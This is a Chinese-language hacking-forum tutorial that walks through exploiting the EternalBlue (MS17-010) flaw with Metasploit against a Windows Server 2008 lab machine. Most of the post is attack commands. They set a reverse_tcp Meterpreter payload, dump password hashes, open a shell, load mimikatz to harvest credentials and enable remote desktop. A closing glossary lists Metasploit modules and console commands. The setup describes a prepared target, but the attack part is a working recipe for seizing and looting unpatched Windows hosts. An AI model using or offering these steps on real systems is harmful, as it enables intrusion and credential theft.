查看: 7692|回复: 1

MSF - 拿下目标服务器最高权限

[复制链接]
  • TA的每日心情
    奋斗
    2022-1-15 23:17
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2021-12-23 16:01:09 | 显示全部楼层 |阅读模式

    1.        我们准备一台靶机(被攻击机器)   
    Windows server 2008 edition 64位(32位靶机系统需要下载对应32位的攻击模块)
    2.        我们在准备一台攻击机 kali 2021版本
    3.        在靶机里面1.关闭服务器,2.开通445端口,查看靶机ip地址

    4.        在攻击机查看ip地址,然后靶机和被攻击机相互ping网络看看通不通,保证网络通不丢包。


    5.        开启pg数据库服务 service postgresql start

    6.        初始化 msfdb数据库  msfdb init

    7.        开启msfconsole

    每次开启 logo随机不一样
    8.        查看连接数据库状态 db_status

    9.        我们知道永恒之蓝漏洞编号ms17-010,我们就搜索一下 search ms17

    10.        我们以上面序号0,名称exploit/windows/smb/ms17_010_eternalblue 攻击模块为例子,使用模块指令 use 序号/use 名称。use auxiliary/scanner/smb/smb_ms17_010

    或者

    11.        然后看一下设置,看看设置需要配置那些信息 options

    我们看请求必写的yes对应参数
    Rhots 是目前主机,我们设置 set  rhost 192.168.167

    Rport 端口 set rport 445
    12.        设置payload    set payload windows/x64/meterpreter/reverse_tcp


    13.        配置完run

    如果跑失败了,指令和配置没有问题就多跑两遍

    Fail失败后,ctl+c回到上一级继续run 出现win即可。注意靶机防火墙不能开启负责失败。
    14.        简单的指令
    查看用户权限: meterpreter> getuid
    获取hash密码: meterpreter> hashdump
    上传文件: meterpreter> upload 文件名
    执行文件: meterpreter> execute -f  notepad.exe
    获取屏幕截图:meterpreter>screenshot
    获取shell:meterpreter>shell
    15.        加载猕猴桃 load mimikatz

    Mf6版本使用 wiki指令
    16.        使用 creds_all

    17.        我们可以开通远程桌面 run post/windows/manage/enable_rdp

    18.        登录
      
    19.        比如我们执行打开计算器或者记事本
    Execute -f calc.txt/notepad.exe




    综合框架
    Auxiliary         辅助模块          为渗透测试信息搜集提供了大量的辅助模块支持

    Exploits        攻击模块          利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。

    Payload        攻击载荷模块           攻击成功后促使靶机运行的一段植入代码

    Post                后渗透攻击模块  收集更多信息或进一步访问被利用的目标系统

    Encoders     编码模块        将攻击载荷进行编码,来绕过防护软件拦截
    其他指令
    简单好用的帮助指令
    help/?               帮助菜单
    exit                退出MSF控制台
    Back         返回上一级
    info                显示一个或者多个模块的信息

    show                显示所给类型的模块

    background   将当前操作在后台运行

    use                 使用所选择的模块
    set                设置选项

    unset                取消设置的选项
    session        会话

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-4-24 14:55 , Processed in 0.027564 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部